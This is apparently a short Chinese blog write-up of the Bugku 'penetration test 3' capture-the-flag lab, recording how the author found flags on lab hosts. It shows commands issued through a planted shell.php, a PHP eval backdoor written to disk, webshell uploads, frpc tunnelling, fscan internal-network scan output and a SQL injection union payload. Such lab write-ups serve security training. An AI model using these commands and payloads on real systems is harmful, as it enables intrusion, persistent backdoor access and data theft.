bugku渗透测试3 WP

bugku渗透测试3 WP

flag1,2,3




爆破网段

发现1,2,10,138,250的时候有变化


猜测木马文件名为shell.php




远程下载frpc

http://192.168.0.10/shell.php?cmd=chmod 777 frpc
http://192.168.0.10/shell.php?cmd=./frpc -c frpc.ini

192.168.0.10/shell.php?cmd=echo "<?php phpinfo();@eval(\$_POST[1]);?>" > 1.php


然后利用蚁剑上传哥斯拉的木马

利用哥斯拉上传fscan扫描

避坑无ping权限

fscan加上-np参数
./fscan -np -h xxx > 1.txt

start infoscan
192.168.0.1:22 open
192.168.0.10:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.138:80 open
192.168.0.250:80 open
192.168.0.2:9000 open
192.168.0.10:9000 open
192.168.0.250:9000 open
[*] WebTitle: http://192.168.0.138      code:200 len:953    title:Bugku分数查询系统
[*] WebTitle: http://192.168.0.1        code:200 len:1987   title:站长之家 - 模拟蜘蛛爬取
[*] WebTitle: http://192.168.0.250      code:200 len:2035   title:用户登录
[*] WebTitle: http://192.168.0.10       code:200 len:770    title:葫芦娃小组
[+] http://192.168.0.250 poc-yaml-eea-info-leak-cnvd-2021-10543 
[+] http://192.168.0.250 poc-yaml-php-cgi-cve-2012-1823 
[+] http://192.168.0.10 poc-yaml-php-cgi-cve-2012-1823
10.10.0.1:22 open
10.10.0.22:80 open
10.10.0.5:80 open
10.10.0.1:80 open
10.10.0.5:9000 open
10.10.0.22:9000 open
[*] WebTitle: http://10.10.0.5          code:200 len:770    title:葫芦娃小组
[*] WebTitle: http://10.10.0.22         code:200 len:3764   title:Bugku 渗透测试3 - home
[+] http://10.10.0.5 poc-yaml-php-cgi-cve-2012-1823 
[+] http://10.10.0.1 poc-yaml-php-cgi-cve-2012-1823

flag7,8
http://192.168.0.250/
配置burpsuite的socks5代理





flag4
http://192.168.0.138
0 union select 1,2,3,flag from flag

flag5,6
http://10.10.0.22/


刚开始以为在这里getshell,不行

发现另一个文件上传点


posted @ 2023-10-08 14:24  BattleofZhongDinghe  阅读(236)  评论(0编辑  收藏  举报